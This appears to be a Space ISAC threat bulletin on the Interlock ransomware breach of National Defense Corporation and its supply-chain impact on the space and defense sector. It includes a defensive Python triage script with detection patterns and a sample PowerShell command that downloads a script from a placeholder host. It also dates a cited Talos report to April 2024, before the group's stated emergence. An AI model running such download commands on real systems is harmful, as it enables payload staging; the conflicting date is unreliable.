Overview:

On May 13, 2025, the Interlock ransomware group made headlines with its latest target, National Defense Corporation (NDC), and its subsidiary, AMTEC. Interlock is a relatively new ransomware outfit, first appearing in September 2024 and garnering attention for its targeting of high-profile entities, which researchers refer to as “big-game hunting.” This recent attack demonstrates an evolution in scope for the group, and corroborating analysis from security firm Resecurity helps break down the far-reaching impacts that incidents of this nature may have on the Defense Industrial Base (DIB) and broader stakeholders.

According to the group’s own claims on their leak site, Interlock exfiltrated a staggering 4.2 terabytes of data from NDC systems. This trove reportedly contains nearly 3 million files across 450,000 folders, including 1.6 GB housed in a folder labeled Customer Files. Among the exposed documents are references to top-tier defense contractors and space stakeholders—though the full scope and authenticity of the data remain under review.

The incident was initially disclosed by DataBreaches.net on March 31, 2025, and later confirmed in a regulatory filing by NDC’s parent company, National Presto Industries.

About Interlock Ransomware:

The Interlock group first emerged in September 2024 and quickly developed a reputation for targeting high-value sectors. Although it had not previously shown interest in space-related organizations, its targeting of NDC and AMTEC may signal a shift. Resecurity analysts believe this was a deliberate and targeted operation, potentially with nation-state backing—though conclusive attribution remains unconfirmed.

Interlock’s tradecraft, as detailed in an April 2024 Cisco Talos report, includes the use of remote access tools, commodity malware, and custom scripts to gain and maintain access. Notably, the group employs:

  • PowerShell downloaders and batch scripts for staging and payload execution
  • Legitimate IT tools such as AnyDesk and Remote Utilities for stealthy lateral movement
  • AES-encrypted containers to conceal exfiltrated data
  • Anti-analysis techniques that check for sandboxes or virtualized environments

These tactics align with MITRE ATT&CK techniques such as T1078 (Valid Accounts), T1059.001 (PowerShell), and T1497 (Virtualization/Sandbox Evasion), underscoring the sophistication of the group’s operations.
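As an added example (not code from Cisco Talos, Resecurity or Space ISAC), the sketch below runs a minimal triage pass over process-creation events for three of the behaviours listed above: PowerShell downloaders, batch-script staging, and remote-access tools on hosts where they are not sanctioned. The event schema, host names, allowlist and sample events are constructed assumptions, and the patterns are generic heuristics, not Interlock indicators.

```python
import re

# Generic heuristics for the listed behaviours; NOT Interlock-specific indicators.
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
PS_DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer",
    re.I)
# Batch/cmd scripts launched from user-writable staging locations.
STAGED_BATCH = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|windows\\temp|programdata)\\[^\"]*\.(?:bat|cmd)\b", re.I)
RMM_IMAGES = {"anydesk.exe": "AnyDesk", "rutserv.exe": "Remote Utilities",
              "rfusclient.exe": "Remote Utilities"}
APPROVED_RMM_HOSTS = {"HELPDESK-01"}  # assumption: hosts where IT sanctions these tools

def triage(event):
    """Return findings for one process-creation event (hypothetical dict schema)."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    findings = []
    if image in PS_IMAGES and PS_DOWNLOAD.search(cmd):
        findings.append("T1059.001: PowerShell fetching remote content")
    if image == "cmd.exe" and STAGED_BATCH.search(cmd):
        findings.append("batch script run from user-writable path")
    if image in RMM_IMAGES and event["host"] not in APPROVED_RMM_HOSTS:
        findings.append(f"{RMM_IMAGES[image]} outside remote-access allowlist")
    return findings

# Constructed sample events (not real telemetry).
EVENTS = [
    {"host": "WS-114", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -nop Invoke-WebRequest -Uri http://example.invalid/s.ps1 -OutFile C:\Users\Public\s.ps1"},
    {"host": "WS-114", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c C:\Users\jdoe\AppData\Local\Temp\run.bat"},
    {"host": "WS-114", "image": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "command_line": r"C:\Users\jdoe\Downloads\AnyDesk.exe"},
    {"host": "HELPDESK-01", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "command_line": r"AnyDesk.exe --control"},
    {"host": "WS-020", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe Get-ChildItem C:\Temp"},
]

def triage_all(events):
    """Flatten findings into (host, finding) pairs for review."""
    return [(e["host"], f) for e in events for f in triage(e)]

if __name__ == "__main__":
    for host, finding in triage_all(EVENTS):
        print(host, finding)
```

Because AnyDesk and Remote Utilities are legitimate tools, the allowlist check carries the signal here: the same binary is ignored on the sanctioned help-desk host and flagged on the workstation.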

While many elements of Interlock’s behavior point to financially motivated cybercrime, its choice of target and the strategic value of the exfiltrated data suggest broader implications.

Significance to Space:

While ransomware attacks frequently target smaller organizations, breaches like the one involving NDC demonstrate how cybercriminal groups increasingly view the DIB as a lucrative and strategic target. Attacks on Original Equipment Manufacturers (OEMs), suppliers, and subcontractors not only disrupt operations but also expose sensitive data about customers, contracts, and interdependencies—data that could be weaponized in future cyber campaigns.

The cascading effects of such incidents can be severe: supply chain partners are put at risk, military program timelines can be disrupted, and sensitive business relationships are impacted. Even when classified data is not directly compromised, the exposure of contract documents, procurement records, and other non-public information offers adversaries a roadmap of the defense ecosystem. The exfiltrated data published by Interlock, and analyzed by Resecurity, contains data belonging to several key stakeholders in the global space industry.

Conclusion:

This incident underscores how ransomware attacks on suppliers, OEMs and distributors can cause cascading operational and reputational impacts to defense contractors and other customers within commercial and military space. Ransomware groups engaging in double extortion operations often view DIB entities as valuable, high-profile targets due to the potential for enumerating their network of suppliers for future attacks. Government and military-related datasets are often touted on dark web marketplaces as valuable resources for other hacking groups and cybercriminals.

Space ISAC continues to monitor developments and encourages all stakeholders to evaluate their exposure to third-party risk, adopt a zero-trust architecture, and share intelligence proactively. As ransomware operations like Interlock increasingly target manufacturers and affiliated entities, it's critical to recognize that even indirect compromises can expose sensitive, non-public information—potentially enabling threat actors to expand their scope, escalate extortion efforts, and conduct intelligence gathering against space and defense organizations that may have previously been beyond their immediate reach.